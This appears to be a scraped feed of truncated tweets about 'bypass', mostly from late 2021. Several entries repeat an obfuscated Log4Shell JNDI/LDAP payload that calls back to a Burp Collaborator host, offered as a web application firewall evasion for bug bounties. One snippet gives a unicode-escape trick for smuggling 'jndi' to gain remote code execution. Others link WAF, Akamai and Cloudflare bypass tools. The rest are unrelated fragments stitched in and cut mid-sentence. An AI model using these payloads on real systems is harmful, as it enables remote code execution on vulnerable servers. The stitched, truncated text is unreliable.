Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...January 15, 2022
I have created a simple python tool to generate list of log4j payloads which will help you to bypass WAF.
GitHub link : https://t.co/GQl46UW1u6
#py ...December 28, 2021
Tips to bypass a WAF and get RCE with #log4j, if you have a request with a JSON body, replace your "jndi" with \u006a\u006e\u0064\u0069 in this way:
...December 17, 2021
🛠 You can bypass Cloudflare Access in your #cypress tests by creating an interceptor that adds the CF-Access-Client headers from your CA control pa ...December 14, 2021
🛠 You can bypass Cloudflare Access in your #cypress tests by creating an interceptor that adds the CF-Access-Client headers from your CA control pa ...December 14, 2021
A bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
#log4j #Log4Shell #log4jR ...December 13, 2021
Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...December 12, 2021
Here is some recent research on how to bypass the current generation of WAF rules trying to block the ongoing Log4j RCE incident. #upgrade
https://t. ...December 11, 2021
Very easy to bypass Cloudflare by hitting the Origin IP directly (if known). I would argue that on top of using ACLs to restrict inbound connections t ...October 12, 2021
pFuzz - Helps Us To Bypass Web Application Firewall By Using Different Methods At The Same Time https://t.co/dEfViZmgcD #security #opensource #cyberse ...October 5, 2021
1. It's a "news" profile but refuses to cite the source of content;
2. It provides no context on why those payloads are that way;
3. It says "LFI" not ...September 15, 2021
Bug bounty companies be like "We are not interested in bugs in things that aren't our products. Unless you can non-destructively prove RCE exists in o ...September 7, 2021
If your website forces people to train your AI, you are a shitty organization. Not only is this inaccessible, but the "bypass" forces one to accept sp ...July 21, 2021
The Salt Open project is a community-driven initiative to build a complete, enterprise-ready software platform for modern infrastructure.
Salt is an ...July 19, 2021
We increased e-commerce orders by 75% on a major brand’s website with a simple A/B test.
The Challenge:
A major US retailer had been struggling to g ...July 16, 2021
Goal setting is very straightforward but only eight percent of people actually achieve their goals. If you have the desire to improve your application ...July 13, 2021
A lot of people are talking about the new Star Wars movie, The Force Awakens. I’m not one of them. I’m not going to see it. I’m not going to see ...July 13, 2021
I'm a security researcher who has worked at Google, Microsoft, and now Barracuda Networks. I'm interested in all things security, especially web secur ...July 13, 2021
decided to open source my akamai bypass today. if it helped you, please share it to others.
https://t.co/w6dcyg6NBD
@monitorbypass
@akamaibypasser ...July 13, 2021